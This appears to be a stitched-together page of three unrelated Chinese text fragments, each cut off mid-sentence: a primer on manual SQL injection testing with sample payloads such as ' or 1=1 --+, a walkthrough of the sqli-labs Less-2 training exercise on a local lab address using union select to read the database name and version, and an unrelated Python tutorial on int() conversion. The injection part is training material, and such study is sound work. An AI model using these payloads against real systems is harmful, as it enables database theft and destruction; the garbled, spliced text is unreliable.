Sql注入--数字型手工测试 漏洞原因:是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中后,被当作SQL语句的一部分执行. 从而导致数据库受损(被脱裤.被删除.甚至整个服务器权限沦陷) 测试语句: 直接加参数判断 ' / \ (有报错代表可能有注入点) 1 and 1=1 1 and 1=2 1' or 1=1 --+ 1' or 1=1 # 1' or '1'='1 发现有注入点,测试步骤: 判断字段数 1' order by
经测试,发现是数字型的注入,直接 and 1=1 返回正常,and1=2返回错误,感觉比第一关更加简单一点啊,,透~ 经测试order by 为 3 . 1. union 注入 http://192.168.48.130/sqli-labs-master/Less-2/?id=-1 union select 1,database(),version() 得到当前数据库为security ,mysql版本5.5.53 查找所有的数据库:http://192.168.48.130/sqli-labs
数字 int a1 =123 a2=456 int 讲字符串转换为数字 a = " #字符串 b = int(a) #将字符串转换成整形 b = b + 1000 #只有整形的时候才可以进行数值运算 例: a = "123"print(type(a),a)b =int (a)print(type(b),a) 输出: <class 'str'> 123 <class 'int'> 123 num= " v =int(num,base=2) #